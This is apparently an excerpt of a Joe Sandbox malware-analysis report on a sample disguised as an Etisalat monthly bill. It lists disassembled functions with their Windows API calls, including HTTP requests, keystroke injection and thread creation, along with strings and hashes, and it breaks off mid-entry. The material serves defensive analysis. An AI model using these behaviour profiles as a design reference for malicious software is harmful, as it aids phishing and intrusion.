Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 09a8e101dcc15394700a453ab4871c87b918d90a9ede145698a280b17f8e3b5c
Instruction ID: 5cd4a1cc6c32298d6958daed157c58f96de84db5675dc79462b074ed79887d0f
Opcode Fuzzy Hash: 09a8e101dcc15394700a453ab4871c87b918d90a9ede145698a280b17f8e3b5c
Instruction Fuzzy Hash: AD119276100108BFCB02EF58D892DDD3FA5FF15350F4146A6FA489B322DA31EA50AB91

Function 008A1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008A1459
OleUninitialize.OLE32(?,00000000), ref: 008A14F8
UnregisterHotKey.USER32(?), ref: 008A16DD
DestroyWindow.USER32(?), ref: 008E24B9
FreeLibrary.KERNEL32(?), ref: 008E251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 008E254B

Strings

close all, xrefs: 008A1454

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: fb61ea49fdb10fda5abe3609a2e06200ae3c502fe750e2872a0d6694ea1cf9f8
Instruction ID: fb7f55af29d54e88bcaa57d90d645a91f367c719a8f6e873440b6cc030adf329
Opcode Fuzzy Hash: fb61ea49fdb10fda5abe3609a2e06200ae3c502fe750e2872a0d6694ea1cf9f8
Instruction Fuzzy Hash: 15D18B31701212CFDB29EF19C999A69F7A4FF06704F1542ADE44AEB662CB30AD12CF51

Function 00917DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00917FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00917FC1
GetFileAttributesW.KERNEL32(?), ref: 00917FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00918005
SetCurrentDirectoryW.KERNEL32(?), ref: 00918017
SetCurrentDirectoryW.KERNEL32(?), ref: 00918060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009180B0

Strings

*.*, xrefs: 00918066

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 0c18cce89b66ac245cbaabed3e464dda32ffa39a9b731cbd43f71dda3c52b265
Instruction ID: f4f9e35a27ed1fd7273270d0a668b6f38599c6b9d0bab51c522fa212e11b87c5
Opcode Fuzzy Hash: 0c18cce89b66ac245cbaabed3e464dda32ffa39a9b731cbd43f71dda3c52b265
Instruction Fuzzy Hash: CB81807260824A9BDB20EF54C844AEAF7E9FB89310F144C5EF885D7260DB35DD85CB52

Function 008A5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 008A5C7A

Part of subcall function 008A5D0A: GetClientRect.USER32(?,?), ref: 008A5D30
Part of subcall function 008A5D0A: GetWindowRect.USER32(?,?), ref: 008A5D71
Part of subcall function 008A5D0A: ScreenToClient.USER32(?,?), ref: 008A5D99

GetDC.USER32 ref: 008E46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 008E4708
SelectObject.GDI32(00000000,00000000), ref: 008E4716
SelectObject.GDI32(00000000,00000000), ref: 008E472B
ReleaseDC.USER32(?,00000000), ref: 008E4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008E47C4

Strings

U, xrefs: 008E4693

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 0673b96d9e972b8938d6b18b95d7a54c3e14ff4cb4a65c3ac7ed40f94fce3a24
Instruction ID: 311f7f9d5c67dc364ffc02f45d4943e27409120dee1bed0fc302584f0db42e58
Opcode Fuzzy Hash: 0673b96d9e972b8938d6b18b95d7a54c3e14ff4cb4a65c3ac7ed40f94fce3a24
Instruction Fuzzy Hash: F1710031404249DFDF218F64CD84ABA7BB1FF4B324F145269ED59DA2AAC3308881EF90

Function 0091359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009135E4

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

LoadStringW.USER32(00972390,?,00000FFF,?), ref: 0091360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00913724
"%s" (%d) : ==> %s:, xrefs: 00913742
Line %d (File "%s"):, xrefs: 0091366B
Error: , xrefs: 009136EF
^ ERROR, xrefs: 009136C9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 62d1500c191a9c0a145feb4b881acb7c515a00adf97d0ecb9b938652aecf1418
Instruction ID: eb2f582d377a5418907570fabbe6576fa461803b2737cccb47eae3a65cc04a69
Opcode Fuzzy Hash: 62d1500c191a9c0a145feb4b881acb7c515a00adf97d0ecb9b938652aecf1418
Instruction Fuzzy Hash: F6517172904219ABEF15EBA4DC42EEEBB38FF45340F048125F105B25A1EB301B99DF61

Function 00938B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008B9BB2

Part of subcall function 008B912D: GetCursorPos.USER32(?), ref: 008B9141
Part of subcall function 008B912D: ScreenToClient.USER32(00000000,?), ref: 008B915E
Part of subcall function 008B912D: GetAsyncKeyState.USER32(00000001), ref: 008B9183
Part of subcall function 008B912D: GetAsyncKeyState.USER32(00000002), ref: 008B919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00938B6B
ImageList_EndDrag.COMCTL32 ref: 00938B71
ReleaseCapture.USER32 ref: 00938B77
SetWindowTextW.USER32(?,00000000), ref: 00938C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00938C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00938CFF

Strings

@GUI_DROPID, xrefs: 00938C51
@GUI_DRAGFILE, xrefs: 00938C9A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 255ff31c9fd520263992d3a581f28844d09b9903af7e17682958a2e6176996f2
Instruction ID: 5bc40b4e5eedc22de9f881d3cd8b27a4ea8757678041316600da75c043fb3f5f
Opcode Fuzzy Hash: 255ff31c9fd520263992d3a581f28844d09b9903af7e17682958a2e6176996f2
Instruction Fuzzy Hash: 6D517B71108304AFE714DF18DC56FAA77E4FB88754F000629F996A72A1DB70A944DF62

Function 0091C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0091C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0091C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0091C2CA
GetLastError.KERNEL32 ref: 0091C322
SetEvent.KERNEL32(?), ref: 0091C336
InternetCloseHandle.WININET(00000000), ref: 0091C341

Strings

, xrefs: 0091C2BB

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: d3f3a7cf048d7b79f15e3a12a6b94ce793c82d1d6f72eda0d4731fd841de0dac
Instruction ID: 3ed2df986a6e183fd21a7ade36b952ded69712d854212fba3890ca7e6c843dd2
Opcode Fuzzy Hash: d3f3a7cf048d7b79f15e3a12a6b94ce793c82d1d6f72eda0d4731fd841de0dac
Instruction Fuzzy Hash: 94318CF1744608AFD7219FA58C88AEB7BFCEB49744F10891EF456E2200DB34DD859B61

Function 0090989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,008E3AAF,?,?,Bad directive syntax error,0093CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009098BC
LoadStringW.USER32(00000000,?,008E3AAF,?), ref: 009098C3

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00909987

Strings

., xrefs: 0090996D
Line %d (File "%s"):, xrefs: 0090992D
Line %d:, xrefs: 00909912
Error: , xrefs: 00909955
%s (%d) : ==> %s.: %s %s, xrefs: 009098F1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b9028ecab8cd7d45fbdc1d94b94ba55998f27f0985b8f23e15b8dba2e0be9b78
Instruction ID: 641f818c03b9d13d5b4e29bb49838fc930e9ed4261e4599e0e3c50a04f7cb897
Opcode Fuzzy Hash: b9028ecab8cd7d45fbdc1d94b94ba55998f27f0985b8f23e15b8dba2e0be9b78
Instruction Fuzzy Hash: 4C219F3280421AAFDF15AF94CC06EEE7779FF19304F044429F615A21A2EB719A18DB52

Function 0090209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009020AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009020C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0090214D

Strings

largeicons, xrefs: 009020E1
SHELLDLL_DefView, xrefs: 009020CC
details, xrefs: 009020FB
list, xrefs: 0090212F
smallicons, xrefs: 00902115

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: dc74dcc7728739bbbe013a8502b53ddca410c381034194ae6c6716c4269ea9a9
Instruction ID: 2b3cd582cd0b5e9d254d54cd05dcf9784fc2f4440d44bc97db22c2e1bcb5f691
Opcode Fuzzy Hash: dc74dcc7728739bbbe013a8502b53ddca410c381034194ae6c6716c4269ea9a9
Instruction Fuzzy Hash: 9E11067668C717BDFA152734DC0BDA677ACDF05328F21111AFB04F50E1EA75A8425A14

Function 008DCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 008DCEB7
_free.LIBCMT ref: 008DCF22
_free.LIBCMT ref: 008DCF48
_free.LIBCMT ref: 008DCF71
_free.LIBCMT ref: 008DCFA9
_free.LIBCMT ref: 008DCFDA
_free.LIBCMT ref: 008DD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 008DD09C
_free.LIBCMT ref: 008DD0B5

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 7e7edb82806eed236e831ee5b018b1a66be8283b4f3d48b50c8c656fc11731b9
Instruction ID: 6fa0c22334f09de1b94ec1941b19cf294f0ee7ed247dcf79e593e22bb2db722b
Opcode Fuzzy Hash: 7e7edb82806eed236e831ee5b018b1a66be8283b4f3d48b50c8c656fc11731b9
Instruction Fuzzy Hash: 456135B2908306AFDB21AFB89885AA97BA5FF41320F04436FF944D7382DAB19D01D751

Function 009350D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00935186
ShowWindow.USER32(?,00000000), ref: 009351C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 009351CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 009351D1

Part of subcall function 00936FBA: DeleteObject.GDI32(00000000), ref: 00936FE6

GetWindowLongW.USER32(?,000000F0), ref: 0093520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0093521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0093524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00935287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00935296

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 7606f10135cd9c1499e961050fd459d3de846b3ad00448e7a1724712ad6b456f
Instruction ID: 930c9c68d21a1818c46e584520d29d85ac6998869aec6a930049c3f9e88ef6d6
Opcode Fuzzy Hash: 7606f10135cd9c1499e961050fd459d3de846b3ad00448e7a1724712ad6b456f
Instruction Fuzzy Hash: BD51C370A58A08BFEF309F68CC46BD93BA9FB09325F154411FA25962E0C775E990DF41

Function 008B8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 008F6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008F68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008F68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008F68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008F68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008B8874,00000000,00000000,00000000,000000FF,00000000), ref: 008F6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 008F691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,008B8874,00000000,00000000,00000000,000000FF,00000000), ref: 008F692D

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f55f69dff7347b6f26204aedee9191d16498d4b3709d1b8c545d442df1270776
Instruction ID: 81e22eb8af1efcb12c56d932b1a46a4bb977a7a490b8c4c7a5fa37956bba9d7f
Opcode Fuzzy Hash: f55f69dff7347b6f26204aedee9191d16498d4b3709d1b8c545d442df1270776
Instruction Fuzzy Hash: D2518C70610609EFDB24CF28CC55FAA7BB9FB44764F104618FA56D72A0EB70E990EB50

Function 0091C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0091C182
GetLastError.KERNEL32 ref: 0091C195
SetEvent.KERNEL32(?), ref: 0091C1A9

Part of subcall function 0091C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0091C272
Part of subcall function 0091C253: GetLastError.KERNEL32 ref: 0091C322
Part of subcall function 0091C253: SetEvent.KERNEL32(?), ref: 0091C336
Part of subcall function 0091C253: InternetCloseHandle.WININET(00000000), ref: 0091C341

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 4d1ed9a20bf6f04a33015e4cbce5b9a292a925d569019903f40bd599d40f99f1
Instruction ID: 0485357f0c59950c8b0842c9705da22e058f85a0a3916c2eb7b5cf22fe63c452
Opcode Fuzzy Hash: 4d1ed9a20bf6f04a33015e4cbce5b9a292a925d569019903f40bd599d40f99f1
Instruction Fuzzy Hash: 91318EB1384A09BFDB219FA5DC44AABBBFDFF58310B00481DF96692610D734E854AF60

Function 009025A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00903A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00903A57
Part of subcall function 00903A3D: GetCurrentThreadId.KERNEL32 ref: 00903A5E
Part of subcall function 00903A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009025B3), ref: 00903A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009025BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009025DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009025DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009025E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00902601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00902605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0090260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00902623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00902627

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 6b816ebeab2a4891959c07d052dedb0bae0ab93191e211cbf60a02c661f9fe1f
Instruction ID: 3a64674415eb6f9ebebb8cc7b69cab0cafdc3902f9e77f004d00e8fbccdb3f07
Opcode Fuzzy Hash: 6b816ebeab2a4891959c07d052dedb0bae0ab93191e211cbf60a02c661f9fe1f
Instruction Fuzzy Hash: FE01D4713A8610BBFB1067689C8EF593F5DDB8EB12F100002F318BE0D1C9E22444AE69

Function 00901803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00901449,?,?,00000000), ref: 0090180C
HeapAlloc.KERNEL32(00000000,?,00901449,?,?,00000000), ref: 00901813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00901449,?,?,00000000), ref: 00901828
GetCurrentProcess.KERNEL32(?,00000000,?,00901449,?,?,00000000), ref: 00901830
DuplicateHandle.KERNEL32(00000000,?,00901449,?,?,00000000), ref: 00901833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00901449,?,?,00000000), ref: 00901843
GetCurrentProcess.KERNEL32(00901449,00000000,?,00901449,?,?,00000000), ref: 0090184B
DuplicateHandle.KERNEL32(00000000,?,00901449,?,?,00000000), ref: 0090184E
CreateThread.KERNEL32(00000000,00000000,00901874,00000000,00000000,00000000), ref: 00901868

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 3df87dde6f8c6dce8e06f72b4af7cfe4d34a5bed743d98efde5ad4dfbb1e938e
